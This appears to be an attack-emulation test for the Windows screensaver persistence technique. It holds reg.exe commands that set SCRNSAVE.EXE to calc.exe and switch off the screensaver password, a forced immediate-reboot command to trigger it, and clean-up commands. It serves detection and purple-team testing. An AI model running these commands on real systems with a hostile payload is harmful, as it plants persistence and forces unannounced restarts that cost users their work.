
Event Triggered Execution: Screensaver

---------------------------------------------------

reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeout /t REG_SZ /d 60 /f
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d 0 /f
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "C:\Windows\System32\calc.exe" /f

---------------------------------------------------
TO TEST IT

if 1 NEQ 0 shutdown /r /t 0
---------------------------------------------------

CLEAN UP

reg delete "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /f
reg delete "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeout /f
reg delete "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /f
reg delete "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /f





